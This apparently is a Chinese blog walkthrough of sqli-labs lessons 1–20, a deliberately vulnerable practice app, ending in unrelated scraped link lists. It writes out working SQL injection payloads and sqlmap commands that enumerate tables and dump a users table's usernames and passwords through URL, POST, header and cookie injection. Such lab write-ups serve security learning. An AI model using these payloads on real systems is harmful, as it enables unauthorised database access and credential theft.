1. less1

首先输入?id=1 查找是否有注入点.

输入单引号 回显报错 说明有注入漏洞 而且是数字型

输入 1’ or 1=1 order by 1 猜测列名#

这里发现#不能变成url编码 查一下 应该是%23

http://localhost/sqli-labs-master/Less-1/?id=1%27%20or%201=1%20order%20by%201%20#

在order by 4 的时候报错,说明select语句应该有三列.

然后获取当前数据库:

1’ or 1=1 union select 1,2,database() %23

但是后来知道 这里无论怎样返回的都是第一列的结果,所以把id=1改成id=0再注入

所以可以知道当前数据库的名称是 security

然后获取当前数据库中的表:

0' union select 1,group_concat(table_name) from information_schema.tables where table_schema = database(),3 %27

可以看到 表名有 emails,refers,uagents,users 接下来就是获取users中的字段

0' union select 1,2,group_concat(column_name)from information_schema.columns where table_name ='users' %23

表中的字段有 id,username,password

之后获取我们感兴趣的字段的内容:

http://localhost/sqli-labs-master/Less-1/?id=0'%20union%20select%201,2,group_concat(id,username,password)from%20users%20%23

第一道题目完成.

2. less2

这道题是数字型注入:

所以和第一道题类似,不需要加单引号就可以。

获取当前数据库0 union select 1,2,database() %23

然后获取表:

0 union select 1,2,group_concat(table_name)from information_schema.tables where table_schema=database() %23

然后获取字段:

0 union select 1,2,group_concat(column_name)from information_schema.columns where table_name = 'users' %23

然后获取内容:

0 union select 1,2,group_concat(password) from users %23

第二道题完成。

3. less3

看回显报错 代码中 id 应该是 id =(‘$id’)

0') union select 1,2,3 %23实验一下是不是这么构造:

成功 所以接下来像前三关一样获取当前数据库,表,字段,内容就可以了.

第三题完成

4. less4

发现输入单引号 没有报错 输入双引号:

所以和上一个很像,应该用”)拼凑就可以了。

试一下 还是 union select 1,2,3 %23

成功了。

之后还是老方法,获取数据库,表,字段,内容

第四道题目完成.

5. less5

本关用前面的方法都无法注入回显,因为代码中不显示内容。所以需要利用基于错误的语句来注入。

http://localhost/sqli/Less-5/?id=1'and(select 1 from(select count(*),concat(char(32,58,32),(select concat_ws(char(32,58,32),id,username,password)fromuserslimit0,1),char(32,58,32),floor(rand()*2))name from information_schema.tables group by name)b) --+

这里需要不停的刷新 直到显示出来为止。

6. less6

和第五道题类似,但是需要把单引号改成双引号:

http://localhost/sqli/Less-6/?id=1" and (select 1 from(select count(*),concat(char(32,58,32),(select concat_ws(char(32,58,32),id,username,password) from users limit 0,1),char(32,58,32),floor(rand()*2))name from information_schema.tables group by name)b) --+

7. less7

首先构造能够注入的语句, 发现是 id=1’))类型。

这里题目应该是导出文件:

但是上网搜了之后 用输出文件的语句 发现不行 只好用sqlmap了。。。

sqlmap -u http://192.168.48.129/sqli-labs-master/Less-7/?id=1

之后获取当前数据库名称:

sqlmap -u http://192.168.48.129/sqli-labs-master/Less-7/?id=1 --current-db

之后获取表:

sqlmap -u http://192.168.48.129/sqli-labs-master/Less-7/?id=1 -D security --tables

然后获取users中的字段:

-u http://192.168.48.129/sqli-labs-master/Less-7/?id=1 -D security -T users --columns

最后获取password内容:

sqlmap -u http://192.168.48.129/sqli-labs-master/Less-7/?id=1 -D security -T users -C password --dump

第7关完成

8. less8

在这一题,数据库的错误不再回显到页面上,但是我们可以发现当我们构造异常查询时,页面上的you are in会消失,这就是典型的布尔盲注

sqlmap -u http://192.168.48.129/sqli-labs-master/Less-8/?id=1

可以看到 要比上一道题复杂的很多 也耗费时间了:

之后获取当前的dbs

sqlmap -u http://192.168.48.129/sqli-labs-master/Less-8/?id=1 --current-db

然后获取其中的表:

sqlmap -u http://192.168.48.129/sqli-labs-master/Less-8/?id=1 -D security --tables

然后获取users中的字段:

sqlmap -u http://192.168.48.129/sqli-labs-master/Less-8/?id=1 -D security -T users --columns

然后获取password中的内容:

sqlmap -u http://192.168.48.129/sqli-labs-master/Less-8/?id=1 -D security -T users -C password --dump

第八关完成.

9,10关和第八关类似 都有时间注入 所以用sqlmap跑就可以 ,或者自写python脚本.

11. less11

本关开始有post注入了

需要用到sqlmap中的一个 --form 的语句:

可以获取页面 然后构造需要post的数据:

sqlmap -u http://192.168.48.129/sqli-labs-master/Less-11/ --forms --dbs

然后获取当前数据库:

sqlmap -u http://192.168.48.129/sqli-labs-master/Less-11/ --forms ---current-db

然后获取表名:

sqlmap -u http://192.168.48.129/sqli-labs-master/Less-11/ --forms  -D security --tables

然后获取users的字段:

sqlmap -u http://192.168.48.129/sqli-labs-master/Less-11/ --forms  -D security -T users --columns

最后获取password的内容:

sqlmap -u http://192.168.48.129/sqli-labs-master/Less-11/ --forms  -D security -T users -C password --dump

12,13,14:less12 less13 less14

这关和上关类似 直接sqlmap一路到底就可以。

sqlmap -u http://192.168.48.129/sqli-labs-master/Less-12/ --forms -D security -T users -C password --dump

sqlmap -u http://192.168.48.129/sqli-labs-master/Less-13/ --forms -D security -T users -C password --dump

sqlmap -u http://192.168.48.129/sqli-labs-master/Less-14/ --forms -D security -T users -C password --dump

15:less15

这关 需要设置更高的 level:

sqlmap -u http://192.168.48.129/sqli-labs-master/Less-15/ --forms -D security -T users -C password --dump --level3

更加复杂:

16. less16

第十六关 和第十五关类似:

sqlmap -u http://192.168.48.129/sqli-labs-master/Less-16/ --forms -D security -T users -C password --dump --level3

17. less17

第17关尝试 用burp抓包,然后获取整个页面的信息后保存在/root/home/1.txt文件中

然后

sqlmap -r "1.txt" -p passwd --tech E --dbms mysql --batch -v 0

18. Less18

sqlmap -u http://192.168.48.129/sqli-labs-master/Less-18/ --user-agent="Mozilla/5.0 (Windows NT 10.0; WOW64; rv:61.0) Gecko/20100101 Firefox/61.0*" --level 4 --dbs --threads 10 --technique BEST –batch

19. less19

sqlmap -u http://192.168.48.129/sqli-labs-master/Less-19/ --referer=" http://127.0.0.1/sqli-labs-master/Less-19/*" --level 4 --dbs --threads 10 --technique BEST –batch

20.

cookie注入:

sqlmap -u http://192.168.48.129/sqli-labs-master/Less-20/ --cookie="UM_distinctid=16668b878941c2-088ac16771352f-38694646-12c000-16668b878961048" --dbs

sqli-labs 1-20实验记录的更多相关文章

  1. SQLI LABS Basic Part(1-22) WriteUp

    好久没有专门练SQL注入了,正好刷一遍SQLI LABS,复习巩固一波~ 环境: phpStudy(之前一直用自己搭的AMP,下了这个之后才发现这个更方便,可以切换不同版本的PHP,没装的小伙伴赶紧试 ...

  2. Sqli labs系列-less-2 详细篇

    就今天晚上一个小插曲,瞬间感觉我被嘲讽了. SQL手工注入这个东西,杂说了吧,如果你好久不玩的话,一时说开了,你也只能讲个大概,有时候,长期不写写,你的构造语句还非常容易忘,要不我杂会被瞬间嘲讽了啊. ...

  3. 实验记录:Oracle redo logfile的resize过程

    实验记录:Oracle redo logfile的resize过程. 实验环境:RHEL 6.4 + Oracle 11.2.0.3 单实例 文件系统 实验目的:本实验是修改redo logfile的 ...

  4. case7 淋巴瘤子类分类实验记录

    case7 淋巴瘤子类分类实验记录 简介 分类问题:3分类 (identifying three sub-types of lymphoma: Chronic Lymphocytic Leukemia ...

  5. 使用Scapy向Mininet交换机注入流量 实验记录

    使用Scapy向Mininet交换机注入流量 实验记录 用Python脚本及Scapy库写了一个简单的流量生成脚本,并打算使用该脚本往Mininet中的OpenvSwitch交换机注入流量.拓扑图如下 ...

  6. “取出数据表中第10条到第20条记录”的sql语句+selecttop用法

    1.首先,select top用法: 参考问题 select top n * from和select * from的区别 select * from table -- 取所有数据,返回无序集合 sel ...

  7. “取出数据表中第10条到第20条记录”的sql语句+select top 使用方法

    1.首先.select top使用方法: 參考问题  select top n * from和select * from的差别 select * from table --  取全部数据.返回无序集合 ...

  8. Sqli labs系列-less-3 。。。

    原本想着找个搜索型的注入玩玩,毕竟昨天被实力嘲讽了 = = . 找了好长时间,我才发现,我没有 = = ,网上搜了一个存在搜索型注入的源码,我看了好长时间,楞没看出来从哪里搜索注入了....估计是我太 ...

  9. Sqli labs系列-less-1 详细篇

    要说 SQL 注入学习,网上众多的靶场,就属 Sqli labs 这个系列挺不错的,关卡达到60多关了,我自己也就打了不几关,一个挺不错的练习SQL注入的源码. 我一开始就准备等我一些原理篇总结完了, ...

  10. SUCTF 2019 Upload labs 2 踩坑记录

    SUCTF 2019 Upload labs 2 踩坑记录 题目地址 : https://github.com/team-su/SUCTF-2019/tree/master/Web/Upload La ...

随机推荐

  1. CSS和文档流

    1.  CSS的定位机制有3种:普通流.浮动和定位. 2.  文档流:从上到下,从左到右,一个挨一个的简单或者叫正常布局. 3.  定位:(position) Static:保持文档流. Relati ...

  2. MySQL之innochecksum初探

    innochecksum是一个用于校验innodb表空间文件完整性的工具,这是一个官方自带的工具,关于它的介绍,可以查看MySQL官方文档,下文主要是通过innodb_ruby来对innochecks ...

  3. Oracle数据库克隆后temp文件因路径变化无法找到问题

    Oracle数据库克隆后temp文件因路径变化无法找到出现如下报错Errors in filexxxx.trc:ORA-01157: cannot identify/lock data file xx ...

  4. libxml

    /** * section: Tree * synopsis: Navigates a tree to print element names * purpose: Parse a file to a ...

  5. Ubuntu 下安装Mongodb

    Mongodb是一款开源的数据库,这里不用我多说了,下面说一下Ubuntu下安装Mongodb可能遇到的问题和解决方案. 故事背景: 今天M$促销,1¥Windows Azure 4000¥-30天的 ...

  6. ABAP正则表达式 vs SPLIT INTO

    需求: 把如下通过"/"连接起来的三个字符串分别解析出来. 传统的做法见下图第98行的function module SKWF_UTIL_IO_FIND_BY_KEY: 这个fun ...

  7. 关于SessionFactory的不同实现类分别通过getCurrentSession()方法 和 openSession() 方法获取的Session对象在保存对象时的一些区别

    一.单向多对一关联关系 一).使用LocalSessionFactoryBean类,即在applicationContext中配置的 <!-- 配置SessionFactory 使用LocalS ...

  8. 自定义Powershell提示符

    实现效果: 实现原理: Powershell将个人配置脚本文件的地址存放在$profile变量中, 通过修改该变量达到想要的目的. 实现过程: 1>创建一个新的配置脚本: 2>编辑脚本内容 ...

  9. 2018.11.24 struts2中的OGNL表达式及两者的结合

    OGNL表达式 OGNL:对象视图导航语言. ${user.addr.name} 这种写法就叫对象视图导航. OGNL不仅仅可以视图导航.支持比EL表达式更加丰富的功能. 理解图示 使用OGNL准备工 ...

  10. 三种方法解决android帮助文档打开慢

    三种方法解决android帮助文档打开慢   经查是因为本地文档中的网页有如下两段js代码会联网加载信息,将其注释掉后就好了 <link rel="stylesheet" h ...